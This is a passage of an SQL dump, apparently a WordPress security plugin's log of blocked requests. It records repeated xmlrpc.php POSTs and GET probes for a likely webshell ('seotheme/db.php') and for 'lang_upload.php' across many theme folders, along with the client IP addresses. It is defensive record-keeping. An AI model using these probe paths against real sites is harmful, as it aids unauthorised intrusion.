(KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','5ByvO6GxdqIHDMaUmLKRYlJe',0,1680745503.2409,1139,'','POST',403,0,515,0,1,'',0),('103.179.190.218',1739833050,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','yXlM5iatNfhjUAE0L8p3oQsw',0,1680745512.7622,1423,'','POST',403,0,515,0,1,'',0),('123.30.238.182',2065624758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','mQfeOMcB1Pw7FdG3t8WE2zoL',0,1680745520.8639,656,'','POST',403,0,515,0,1,'',0),('66.29.132.22',1109230614,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','kQJIo43Ffarexi0Y8S6Hqmpw',0,1680745526.7307,609,'','POST',403,0,515,0,1,'',0),('43.159.34.32',731849248,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','oqHUpWjVSu46BgIxPrG2Y9ER',0,1680745543.3324,652,'','POST',403,0,515,0,1,'',0),('163.172.60.103',2745973863,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','U2SVEteFxMAoL4gPXT5Bj8Qs',0,1680745549.9604,592,'','POST',403,0,515,0,1,'',0),('31.3.152.100',520329316,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Q4OsPD7Av6SjBWrU5Ecnl81t',0,1680746154.1659,1496,'','POST',403,0,515,0,1,'',0),('91.107.196.183',1533789367,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','AUi8Bl7ReNKHwgvaV6pGEjWL',0,1680748306.6722,674,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','4kuavbeULyd8cxYA9rGZFh6P',0,1680748308.1738,636,'','POST',403,0,515,0,1,'',0),('161.97.96.198',2707513542,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','68HemZ0B4KtXAOrfuINylDQ1',0,1680748315.5529,812,'','POST',403,0,515,0,1,'',0),('185.232.250.86',3119053398,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','YjgxDLHrnvEReTiwSQuq1AdI',0,1680748316.3752,703,'','POST',403,0,515,0,1,'',0),('192.111.150.75',3228538443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','MFCrP2IqR7dUEvOwtaiG4jh6',0,1680748324.3677,628,'','POST',403,0,515,0,1,'',0),('113.160.250.146',1906375314,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','xTN5Z3UsFYzSD2mafdPq94hM',0,1680748326.0882,695,'','POST',403,0,515,0,1,'',0),('198.23.62.79',3323412047,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','FeGm2LnUvED83rtCkOfAszBN',0,1680748326.7796,641,'','POST',403,0,515,0,1,'',0),('68.178.145.187',1152553403,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','Ypxa8e53ElUFDQSJVuBGq7cH',0,1680748336.5951,564,'','POST',403,0,515,0,1,'',0),('137.74.157.144',2303368592,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','nFVtfdKYrXA7ULwkezbxR3su',0,1680748340.6059,558,'','POST',403,0,515,0,1,'',0),('146.70.115.219',2454090715,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','oeiJSWPOzHlX1w2DUFMbh5t3',0,1680749079.5022,618,'','POST',403,0,515,0,1,'',0),('213.152.162.74',3583550026,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','I8mh1NJTcSEDKt9xR2OlFdbX',0,1680749583.4257,624,'','POST',403,0,515,0,1,'',0),('213.152.162.74',3583550026,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5kEKjU1VHxwQ9InyA4fOac3h',0,1680749789.3047,578,'','POST',403,0,515,0,1,'',0),('194.187.251.115',3267099507,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TtYRBJdo0XeG7ZxhfMrqK8aA',0,1680751022.7861,721,'','POST',403,0,515,0,1,'',0),('5.231.78.38',99044902,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','x21wXSUirIDMJL5d9VKGapcQ',0,1680752491.1683,1783,'','POST',403,0,515,0,1,'',0),('51.195.105.117',868444533,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','v6mjZedyKIuRLSEJwF7UBX9G',0,1680752491.2700,1685,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','GrEmogUzS54dJDQqTVs3LcKP',0,1680752505.4926,717,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','FJVRTsMoeUdtrzSLOZcPuW7l',0,1680752507.3244,761,'','POST',403,0,515,0,1,'',0),('159.69.27.72',2672106312,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','NZIznWs5Ru8LFqKl0wmtGe7U',0,1680752508.1665,637,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','S42xYpa1kcbTH3DAQvzoKOnN',0,1680752522.5631,1003,'','POST',403,0,515,0,1,'',0),('95.216.1.11',1607991563,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','dI2SpEPQ9fx6ynaHO8l7cBwj',0,1680752523.5917,920,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','TlDz7ohNe68M0udiFZ2LE9K5',0,1680752532.7593,773,'','POST',403,0,515,0,1,'',0),('5.22.249.133',85391749,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ICQgdw0EB7hl1yYn3qAZiKa6',0,1680752536.2454,1048,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Dn9gE6sFPrch2fUWbvB841x5',0,1680752537.1422,923,'','POST',403,0,515,0,1,'',0),('182.50.151.63',3056768831,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','wP9gBSu1vZ5GIVsEFMpJTAhC',0,1680752539.2979,795,'','POST',403,0,515,0,1,'',0),('109.169.53.7',1839805703,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','28Tyvs4r1cYKHhpjCUZId0AN',0,1680752544.1953,804,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','EV1ftlXhgy52r7nbJRBKi4qO',0,1680753304.5921,1575,'','POST',403,0,515,0,1,'',0),('148.72.232.52',2487806004,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','nZk9QmvBaDAyHT6Kd2pweq18',0,1680753303.6452,2702,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','VN810qRPSoumpxQnltz25bje',0,1680753309.1322,669,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','jCUGuRdW1rZxX0kSLJ4wz3Ky',0,1680754424.8906,983,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','FEDMzrP5RXJb80uivkSoG9Ap',0,1680754428.2100,557,'','POST',403,0,515,0,1,'',0),('190.60.234.18',3191663122,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','rsakCDbeFX61OuAPwz7Yd3E5',0,1680754429.6069,620,'','POST',403,0,515,0,1,'',0),('103.152.79.248',1738035192,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','xMZzJEa8uLc0vBrlpkyQFRS2',0,1680754444.8747,638,'','POST',403,0,515,0,1,'',0),('8.140.29.143',143400335,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','L7QcsSCITPbjotdRDK8N60EH',0,1680754447.0252,577,'','POST',403,0,515,0,1,'',0),('68.178.145.187',1152553403,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','JwZFnG2lxsNtmdua1c8fMY76',0,1680754459.9287,641,'','POST',403,0,515,0,1,'',0),('134.19.179.211',2249438163,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','1agHmzfN60eUPRn8Y97FCbyv',0,1680755077.3985,1113,'','POST',403,0,515,0,1,'',0),('184.75.221.195',3091979715,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','UhpdVrfkGjJBXl3ZKzF5WTNP',0,1680757610.8341,734,'','POST',403,0,515,0,1,'',0),('137.184.211.244',2310591476,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','MhZxbqwmV5cAXil30aSd7D2z',0,1680760154.1492,643,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','BUVtxmuOWpT6XywNZlkGqaQ9',0,1680760159.6301,588,'','POST',403,0,515,0,1,'',0),('199.241.139.132',3354495876,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','W1YDOajdVI7HXi8Ggn4tclKr',0,1680760167.2799,710,'','POST',403,0,515,0,1,'',0),('68.178.145.169',1152553385,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','avw43gSEoKXDhJdA19WfGYiy',0,1680760177.9483,635,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Lsy2pYE83SQBaV7jfwdbW5iU',0,1680760179.7817,728,'','POST',403,0,515,0,1,'',0),('37.46.133.245',623805941,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','Ji4evq1L6CpusDYnz7FmwPVM',0,1680760186.0263,604,'','POST',403,0,515,0,1,'',0),('81.208.11.40',1372588840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','0AP9nVbXi3WjxpJQaZSNzmF6',0,1680760189.0544,605,'','POST',403,0,515,0,1,'',0),('156.38.151.68',2619774788,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','rGYdWx7ighSnkbmMTJVPoFCz',0,1680760198.7552,1579,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','3jogJGmrtYELxisA12DWVdhC',0,1680760201.8145,923,'','POST',403,0,515,0,1,'',0),('163.44.192.252',2737619196,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','ErBv5GFf7Tk0ZlLjOUJm1IHq',0,1680760279.1043,1443,'','POST',403,0,515,0,1,'',0),('134.19.179.179',2249438131,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6foKdB2lnSCgZvINyh38W0F1',0,1680761129.6387,3511,'','POST',403,0,515,0,1,'',0),('173.212.218.52',2916407860,'','http://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','7nIcm3LfQuvz9TedNpk2hjBM',0,1680762126.7810,1515,'','GET',403,0,700,0,1,'',0),('173.212.218.52',2916407860,'','https://cmdev-site1.com/wp-content/themes/seotheme/db.php?u','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','92g5wavIi7bPSjYmQBe6tUsJ',0,1680762129.1818,310,'','GET',403,0,700,0,1,'',0),('142.93.86.83',2388481619,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','h90Fs7NC3LikO46cJfU5QTBH',0,1680762633.5218,1045,'','POST',403,0,515,0,1,'',0),('51.77.231.194',860743618,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','wIJnvfqUdi4x360WEGXjm8hz',0,1680762634.0561,1389,'','POST',403,0,515,0,1,'',0),('103.187.168.176',1740351664,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','LPw52M7bmDpsSyKdVkcRqvG3',0,1680762639.4156,626,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','Gme09cF35B4zXtrqkJ6hYinb',0,1680762641.3331,608,'','POST',403,0,515,0,1,'',0),('159.223.93.124',2682215804,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','n8YHrcAy1LWTFKwfepIiRxm9',0,1680762652.2549,752,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','ryZVEJAWju5XsnQoRTBifL2S',0,1680762654.7791,1614,'','POST',403,0,515,0,1,'',0),('184.168.115.25',3098047257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','4aO08ypfGcPxTh9eubBW1SmJ',0,1680762656.0881,1683,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','dZca294kvo5JPjybBCH80VUh',0,1680762668.0333,742,'','POST',403,0,515,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/statfort-new/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.5563.57 Mobile Safari\\/537.36\"}','8gUR3fqGDEyePKrN10OuAF7d',0,1680763515.7460,365,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/faith-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.5563.57 Mobile Safari\\/537.36\"}','xsITURqD0mtKF529Xnv6iHdj',0,1680763517.3595,307,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/soccer-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.5563.57 Mobile Safari\\/537.36\"}','krPWqIgaz6G8yQ5fhCLFlXYH',0,1680763518.5572,282,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/churchlife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Mobile Safari\\/537.36\"}','84JMYSeVgdnHEAWRZlXv5mhG',0,1680763519.6734,294,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/onelife/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Mobile Safari\\/537.36\"}','1TgtXxGkzifD5uoW2dMI7QFv',0,1680763520.8663,302,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/snapture/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','k0pIYSsh1Ae3yBiKD795vjbX',0,1680763523.3377,304,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/theme-deejay/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','dlMX0sh63AEvr5ZRPtBykzpq',0,1680763524.6150,389,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/bolster-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','mzr0tkuX7NDOgIY3nAi8vCls',0,1680763525.9593,314,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/rocky-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 16_3 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/111.0.5563.72 Mobile\\/15E148 Safari\\/604.1\"}','4VFro8csOWn2XZeKkYIdv0qz',0,1680763527.2330,379,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/bolster/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','jLxQyMqRhdWe7VDgUXkt3G8w',0,1680763528.6521,315,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/soundblast/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 13_2_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','lwqap1I2UgZ0bz9hvt8xdQ4C',0,1680763529.8513,283,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/spikes-black/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Mobile Safari\\/537.36\"}','LUhFGrXQP2ilRkKtezxTq8AB',0,1680763530.9988,284,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/spikes/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 12; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.5563.57 Mobile Safari\\/537.36\"}','eYJrF8A3gvcqap7lBkOsN5ZV',0,1680763532.1216,312,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/kingclub-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Mobile Safari\\/537.36\"}','Hykpm7s3N9YK5AT0XrjvuWod',0,1680763533.2828,280,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/club-theme/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; ONEPLUS A6013) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Mobile Safari\\/537.36\"}','SbDvECHXVrf0B3561xhyGPld',0,1680763534.4080,312,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/statfort/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 Safari\\/537.36\"}','xqILiB0U2vrmjf6wDEP9ATQ7',0,1680763535.5612,302,'','GET',403,0,700,0,1,'',0),('5.78.94.39',89021991,'','http://cmdev-site1.com/wp-content/themes/aidreform/include/lang_upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/111.0.0.0 